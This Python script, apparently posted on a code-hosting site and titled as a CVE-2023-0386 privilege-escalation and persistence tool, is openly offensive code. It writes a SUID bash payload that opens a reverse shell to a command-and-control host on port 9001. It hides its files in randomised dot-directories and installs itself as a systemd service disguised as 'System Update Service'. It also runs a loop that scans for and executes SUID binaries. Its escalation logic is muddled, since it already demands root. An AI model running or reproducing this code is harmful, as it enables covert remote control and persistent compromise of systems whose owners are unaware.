157 lines
4.5 KiB
Python
157 lines
4.5 KiB
Python
#!/usr/bin/env python3
|
|
import os
|
|
import sys
|
|
import subprocess
|
|
import shutil
|
|
import time
|
|
import random
|
|
import string
|
|
from threading import Thread
|
|
|
|
# === RANDOMIZED VARIABLES ===
|
|
def random_name(length=8):
|
|
return ''.join(random.choices(string.ascii_lowercase, k=length))
|
|
|
|
PAYLOAD_TAG = random_name()
|
|
PAYLOAD_NAME = "." + random_name()
|
|
HIDDEN_DIR = os.path.expanduser(f"~/.cache/.{random_name()}")
|
|
HIDDEN_PAYLOAD = os.path.join(HIDDEN_DIR, PAYLOAD_NAME)
|
|
|
|
LOWERDIR = f"/tmp/.{random_name()}"
|
|
UPPERDIR = f"/tmp/.{random_name()}"
|
|
WORKDIR = f"/tmp/.{random_name()}"
|
|
MERGED = f"/tmp/.{random_name()}"
|
|
MERGED_SHELL = os.path.join(MERGED, PAYLOAD_NAME)
|
|
|
|
DEBUG = True
|
|
def log(msg):
|
|
if DEBUG:
|
|
print(f"[+] {msg}")
|
|
|
|
# === CORE EXPLOIT LOGIC ===
|
|
def setup_dirs():
|
|
for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED, HIDDEN_DIR]:
|
|
os.makedirs(d, exist_ok=True)
|
|
|
|
def cleanup_dirs():
|
|
log("Cleaning up overlay mounts...")
|
|
subprocess.run(["umount", MERGED], stderr=subprocess.DEVNULL)
|
|
for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED]:
|
|
shutil.rmtree(d, ignore_errors=True)
|
|
|
|
def drop_hidden_payload():
|
|
log("Writing polymorphic SUID payload...")
|
|
|
|
# Get C2 IP from env or fallback
|
|
C2_IP = os.getenv("ROGUE_C2_HOST", "127.0.0.1")
|
|
C2_PORT = "9001"
|
|
|
|
payload = (
|
|
"#!/bin/bash\n"
|
|
f"echo '[ROOT SHELL :: {PAYLOAD_TAG}]'\n"
|
|
f"bash -i >& /dev/tcp/{C2_IP}/{C2_PORT} 0>&1\n"
|
|
)
|
|
|
|
with open(HIDDEN_PAYLOAD, "w") as f:
|
|
f.write(payload)
|
|
os.chmod(HIDDEN_PAYLOAD, 0o4755)
|
|
shutil.copy(HIDDEN_PAYLOAD, os.path.join(UPPERDIR, PAYLOAD_NAME))
|
|
|
|
def mount_overlay():
|
|
log("Mounting overlay filesystem...")
|
|
cmd = [
|
|
"mount", "-t", "overlay", "overlay",
|
|
"-o", f"lowerdir={LOWERDIR},upperdir={UPPERDIR},workdir={WORKDIR}",
|
|
MERGED
|
|
]
|
|
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
|
if result.returncode != 0:
|
|
log("Mount failed. Kernel not vulnerable or run not as root.")
|
|
sys.exit(1)
|
|
|
|
def execute_shell():
|
|
if os.path.exists(MERGED_SHELL):
|
|
log("Launching polymorphic root shell...")
|
|
os.execv(MERGED_SHELL, [MERGED_SHELL])
|
|
else:
|
|
log("Root shell missing. Exploit may have failed.")
|
|
|
|
def suid_scanner_loop():
|
|
log("👁 SUID Scanner loop engaged...")
|
|
scanned = set()
|
|
while True:
|
|
time.sleep(7)
|
|
try:
|
|
result = subprocess.check_output("find / -perm -4000 -type f 2>/dev/null", shell=True)
|
|
suids = result.decode().split("\n")
|
|
for path in suids:
|
|
path = path.strip()
|
|
if not path or path in scanned:
|
|
continue
|
|
scanned.add(path)
|
|
try:
|
|
with open(path, "rb") as f:
|
|
content = f.read()
|
|
if PAYLOAD_TAG.encode() in content:
|
|
log(f"[SUID Scanner] Found tagged payload: {path}")
|
|
os.execv(path, [path])
|
|
except Exception:
|
|
continue
|
|
except Exception:
|
|
continue
|
|
|
|
# === PERSISTENCE ===
|
|
def add_systemd_persistence(script_path):
|
|
log("Installing persistent systemd service...")
|
|
service_name = f"{random_name()}.service"
|
|
service_path = f"/etc/systemd/system/{service_name}"
|
|
|
|
service_contents = f"""[Unit]
|
|
Description=System Update Service
|
|
After=network.target
|
|
|
|
[Service]
|
|
Type=simple
|
|
ExecStart=/usr/bin/python3 {script_path}
|
|
Restart=always
|
|
|
|
[Install]
|
|
WantedBy=multi-user.target
|
|
"""
|
|
with open("/tmp/.sys_service", "w") as f:
|
|
f.write(service_contents)
|
|
|
|
subprocess.run(["mv", "/tmp/.sys_service", service_path])
|
|
subprocess.run(["systemctl", "daemon-reexec"])
|
|
subprocess.run(["systemctl", "enable", service_name])
|
|
subprocess.run(["systemctl", "start", service_name])
|
|
|
|
def install_self():
|
|
log("Installing self in hidden polymorphic path...")
|
|
target_script = os.path.join(HIDDEN_DIR, f"{random_name()}.py")
|
|
shutil.copy2(sys.argv[0], target_script)
|
|
add_systemd_persistence(target_script)
|
|
|
|
# === MAIN ===
|
|
def main():
|
|
if os.geteuid() != 0:
|
|
print("❌ Must run as root.")
|
|
sys.exit(1)
|
|
|
|
print("🔥 POLYROOT: CVE-2023-0386 PRIV ESC + PERSISTENCE 🔥")
|
|
|
|
install_self()
|
|
Thread(target=suid_scanner_loop, daemon=True).start()
|
|
|
|
try:
|
|
setup_dirs()
|
|
drop_hidden_payload()
|
|
mount_overlay()
|
|
time.sleep(1)
|
|
execute_shell()
|
|
finally:
|
|
cleanup_dirs()
|
|
|
|
if __name__ == "__main__":
|
|
main()
|